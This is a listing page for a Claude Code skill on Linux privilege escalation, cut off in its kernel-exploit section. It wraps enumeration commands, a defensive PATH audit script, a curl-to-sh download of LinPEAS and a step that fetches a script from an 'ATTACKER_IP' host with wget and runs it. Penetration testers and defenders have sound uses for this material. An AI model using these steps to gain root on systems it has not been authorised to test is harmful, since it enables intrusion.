Claude Skill

Linux Privilege Escalation

This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems.

Editorial Guide

What to do with this skill

Start with the workflow below, then drop into the upstream source only after the page has narrowed the job for you.

When to use it

Use it when you need Claude Code to follow the workflow defined in the upstream source instead of improvising from generic examples.

Install and setup notes

  • Open the upstream source before treating this page as install-ready, because not every official record is meant to be dropped into a workflow unchanged.
  • Keep the context narrow. These skills are usually strongest when you load only the branch, reference set, or workflow step that matches the current task.
  • If you plan to standardize on this skill for team use, pin the upstream repo and check for updates periodically instead of assuming the official defaults are static.

Example workflow

  1. Start with one narrow task that obviously fits the scope of this Claude Code skill instead of pulling it into every job by default.
  2. Read the overview and first source section, then choose the smallest branch of guidance or references that solves the task in front of you.
  3. Run the change on a real file, command, or workflow, verify the result, and only then widen the skill into a repeatable team pattern.

Compatible agents

This skill is explicitly marked for Claude Code.

Install source

This page does not expose a single copy-paste install command in the normalized record. Use the upstream install source below to confirm the exact steps, file paths, and current setup expectations before you add it to your stack.

Source Content

Normalized top-level metadata comes from the directory layer. The body below is the upstream source content for this item.

Linux Privilege Escalation

Purpose

Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.

Inputs / Prerequisites

Required Access

  • Low-privilege shell access to target Linux system
  • Ability to execute commands (interactive or semi-interactive shell)
  • Network access for reverse shell connections (if needed)
  • Attacker machine for payload hosting and receiving shells

Technical Requirements

  • Understanding of Linux filesystem permissions and ownership
  • Familiarity with common Linux utilities and scripting
  • Knowledge of kernel versions and associated vulnerabilities
  • Basic understanding of compilation (gcc) for custom exploits

Recommended Tools

  • LinPEAS, LinEnum, or Linux Smart Enumeration scripts
  • Linux Exploit Suggester (LES)
  • GTFOBins reference for binary exploitation
  • John the Ripper or Hashcat for password cracking
  • Netcat or similar for reverse shells

Outputs / Deliverables

Primary Outputs

  • Root shell access on target system
  • Privilege escalation path documentation
  • System enumeration findings report
  • Recommendations for remediation

Evidence Artifacts

  • Screenshots of successful privilege escalation
  • Command output logs demonstrating root access
  • Identified vulnerability details
  • Exploited configuration files

Core Workflow

Phase 1: System Enumeration

#### Basic System Information

Gather fundamental system details for vulnerability research:

```bash
# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch
```

#### User and Permission Enumeration

```bash
# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who
```

#### Network Information

```bash
# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l
```

#### Process and Service Enumeration

```bash
# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root
```

#### Environment Variables

```bash
# Full environment
env

# PATH variable (for hijacking)
echo $PATH
```
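
The PATH check above matters to a defender because any relative, missing, or group- or world-writable directory in a privileged account's PATH lets another account place a binary that runs in place of the intended one. The following hardening audit is an added example, not part of the upstream skill; the function names `audit_path` and `demo_audit` and the sample directory layout are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the skill): hardening audit of a PATH string.
# Prints one "<finding><TAB><entry>" line per unsafe entry; silent when clean.
audit_path() {
    local rest entry
    rest="$1:"                       # sentinel colon so the last entry is parsed too
    while [ -n "$rest" ]; do
        entry=${rest%%:*}            # next colon-separated entry
        rest=${rest#*:}
        case $entry in
            /*) ;;                   # absolute path: inspect permissions below
            *)  # '', '.', 'bin' and similar resolve against the current directory
                printf 'relative\t%s\n' "${entry:-<empty>}"
                continue ;;
        esac
        if [ ! -d "$entry" ]; then
            # a directory that does not exist yet may be created later by another user
            printf 'missing\t%s\n' "$entry"
        elif [ -n "$(find -L "$entry" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
            printf 'world-writable\t%s\n' "$entry"
        elif [ -n "$(find -L "$entry" -maxdepth 0 -perm -0020 2>/dev/null)" ]; then
            printf 'group-writable\t%s\n' "$entry"
        fi
    done
}

# Constructed sample layout so the check can be exercised offline.
demo_audit() {
    local t
    t=$(mktemp -d) || return 1
    mkdir "$t/safe" "$t/open" "$t/team"
    chmod 755 "$t/safe"; chmod 777 "$t/open"; chmod 775 "$t/team"
    # The temp prefix is rewritten to TMP so the output is stable between runs.
    audit_path "$t/safe:$t/open::$t/team:bin:$t/gone" | sed "s|$t|TMP|"
    rm -rf "$t"
}

demo_audit
# To audit the live environment instead: audit_path "$PATH"
```

Run it as each privileged account (and against the PATH set in cron and service unit files) and treat any output line as a finding to fix.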

Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

```bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh
```

Transfer scripts to target system:

```bash
# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

Phase 3: Kernel Exploits

#### Identify Kernel Version

```bash
uname -r
cat /proc/version
```

#### Search for Exploits

```bash
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search o
```

<!-- truncated -->
